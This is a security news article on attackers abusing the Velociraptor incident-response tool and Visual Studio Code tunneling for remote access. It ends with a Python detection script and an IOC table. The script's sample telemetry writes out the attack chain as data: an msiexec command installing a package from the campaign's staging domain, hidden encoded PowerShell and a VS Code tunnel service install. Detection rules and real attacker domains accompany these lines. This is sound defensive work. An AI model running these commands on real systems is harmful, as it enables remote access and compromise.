Exploiting Velociraptor – Cyberattackers Use Incident Response Tool for Remote Access

A newly uncovered attack campaign investigated by Sophos’ Counter Threat Unit (CTU) reveals how adversaries are shifting tactics by leveraging legitimate security tools as offensive weapons.

In this case, attackers deployed the open-source Velociraptor digital forensics and incident response (DFIR) tool to establish remote access and pave the way for further compromise.

The incident highlights how readily trusted software can be turned against the organizations that rely on it, giving attackers a legitimate-looking program behind which to conceal malicious activity.

Weaponizing a Tool Meant for Defense

The attack began with the use of the Windows msiexec utility, which downloaded an installer named v2.msi from a Cloudflare Workers domain identified as a staging site for malicious tools.

This installer deployed Velociraptor, a tool typically used by defenders to investigate intrusions, but here repurposed to communicate with a command-and-control server hosted on velo[.]qaubctgg[.]workers[.]dev.

Once installed, attackers executed an encoded PowerShell command to fetch Visual Studio Code from the same domain, running it with its tunnel option enabled.

The tunneling capability in Visual Studio Code, while designed for legitimate development use cases, has been abused in past incidents due to its ability to establish remote connections and enable code execution.

By activating this function, the attackers effectively turned the development environment into a covert channel to their server. To maintain persistence, the adversaries installed the program as a service and redirected its activity to log files.

Shortly after, they downloaded another malicious file named sc.msi, indicating continued staging of tools for later phases of the operation.

Detecting and Stopping a Ransomware Lead-Up

The suspicious use of Visual Studio Code tunneling triggered a Taegis™ alert, which led Sophos analysts to step in quickly. Their immediate advice to isolate the impacted host prevented the attackers from expanding their reach.

Analysis of the intrusion suggested that the activity would likely have progressed toward ransomware deployment if not disrupted.

The process tree revealed how Velociraptor was abused as the mechanism for launching Visual Studio Code’s tunneling mode, illustrating the attackers’ innovative use of a well-known incident response tool to mask malicious behavior.

Several related threats were identified during the investigation, including malware families detected as Troj/Agent-BLMR, Troj/BatDl-PL, and Troj/Mdrop-KDK.

The presence of these indicators suggests that the attackers had already prepared the groundwork for later stages of the campaign, which would have likely included data encryption and extortion.

Lessons for Defenders

This incident reflects a concerning shift in attacker methodology, where legitimate tools designed for investigation and response are co-opted as stealthy offensive utilities.

By reducing their reliance on bespoke malware and instead blending with authorized software activity, adversaries improve their chances of evading initial detection.

For defenders, this means that unexpected instances of Velociraptor or anomalous use of Visual Studio Code tunneling should be treated as serious indicators of compromise.

Implementing strong endpoint monitoring, reviewing access to external domains, and practicing disciplined incident response remain essential measures to mitigate the evolving ransomware threat.
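The behaviours described in the attack chain above (msiexec pulling an installer from a URL, an unexpected Velociraptor process, encoded PowerShell, and Visual Studio Code started in tunnel mode beneath Velociraptor) can be turned into endpoint detection logic. The following script is an added example, not code from the article or from Sophos; it runs over constructed process-creation records whose shape is modelled on Sysmon Event ID 1 (an assumption), uses the two IOC domains the article lists, and treats the hostname allowlist `SANCTIONED_VELOCIRAPTOR_HOSTS` as a placeholder for wherever the security team genuinely runs Velociraptor.

```python
import re
from dataclasses import dataclass

# IOC domains listed in the article, refanged so they match raw telemetry.
IOC_DOMAINS = {"files.qaubctgg.workers.dev", "velo.qaubctgg.workers.dev"}

# Hosts where the security team legitimately runs Velociraptor (assumed value).
SANCTIONED_VELOCIRAPTOR_HOSTS = {"dfir-jump-01"}

# Matches -e, -ec, -enc and -EncodedCommand in a PowerShell command line.
ENCODED_PS = re.compile(r"(^|\s)-e(c|nc|ncodedcommand)?\s", re.IGNORECASE)


@dataclass
class ProcEvent:
    """Minimal process-creation record (shape modelled on Sysmon Event ID 1)."""
    host: str
    pid: int
    ppid: int
    image: str
    cmdline: str


def _basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def _has_ancestor(event, by_pid, needle, max_depth=16):
    """Walk the parent chain looking for an image whose name contains `needle`."""
    cur = by_pid.get(event.ppid)
    for _ in range(max_depth):
        if cur is None:
            return False
        if needle in _basename(cur.image):
            return True
        cur = by_pid.get(cur.ppid)
    return False


def detect(events):
    """Return (pid, rule) pairs for the behaviours the article's attack chain exhibits."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img = _basename(e.image)
        cl = e.cmdline.lower()

        # msiexec pulling its package straight from a URL instead of a local path
        if img == "msiexec.exe" and re.search(r"https?://", cl):
            findings.append((e.pid, "msiexec-remote-install"))

        # any command line that references a known campaign domain
        if any(d in cl for d in IOC_DOMAINS):
            findings.append((e.pid, "ioc-domain"))

        # Velociraptor running on a host the security team never deployed it to
        if "velociraptor" in img and e.host not in SANCTIONED_VELOCIRAPTOR_HOSTS:
            findings.append((e.pid, "unsanctioned-velociraptor"))

        # encoded PowerShell, as used in the incident to fetch Visual Studio Code
        if img in ("powershell.exe", "pwsh.exe") and ENCODED_PS.search(e.cmdline):
            findings.append((e.pid, "encoded-powershell"))

        # VS Code started in tunnel mode; far stronger when Velociraptor is an ancestor
        if img == "code.exe" and re.search(r"(^|\s)tunnel(\s|$)", cl):
            findings.append((e.pid, "vscode-tunnel"))
            if _has_ancestor(e, by_pid, "velociraptor"):
                findings.append((e.pid, "velociraptor-launched-vscode-tunnel"))
    return findings


# Constructed sample telemetry: one malicious chain plus three benign events.
# The base64 in the PowerShell line is a placeholder, not a real payload.
SAMPLE_EVENTS = [
    ProcEvent("ws-finance-07", 4100, 800, r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i https://files.qaubctgg.workers.dev/v2.msi /q"),
    ProcEvent("ws-finance-07", 4200, 4100, r"C:\Program Files\Velociraptor\Velociraptor.exe",
              "Velociraptor.exe --config client.config.yaml client"),
    ProcEvent("ws-finance-07", 4300, 4200,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc UExBQ0VIT0xERVI="),
    ProcEvent("ws-finance-07", 4400, 4300, r"C:\ProgramData\code\code.exe",
              "code.exe tunnel service install"),
    ProcEvent("dev-laptop-22", 5000, 900,
              r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
              r"Code.exe C:\src\app"),
    ProcEvent("dev-laptop-22", 5100, 900, r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\installers\7zip.msi /qn"),
    ProcEvent("dfir-jump-01", 5200, 950, r"C:\Tools\velociraptor.exe",
              "velociraptor.exe --config server.config.yaml frontend"),
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The individual rules are noisy on their own (developers do use VS Code tunnels, and packaging teams do run msiexec), so the value lies in the combinations: an unsanctioned Velociraptor process that is an ancestor of a VS Code tunnel is the process tree the article describes, and a hit on the IOC domains should be treated as confirmed compromise rather than a suspicion. In a real deployment the allowlist and IOC set would be fed from inventory and threat-intelligence sources rather than hard-coded.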

IOC

Indicator | Type | Context
files[.]qaubctgg[.]workers[.]dev | Domain name | Hosted tools used in August 2025 Velociraptor campaign
velo[.]qaubctgg[.]workers[.]dev | Domain name | C2 server used in August 2025 Velociraptor campaign
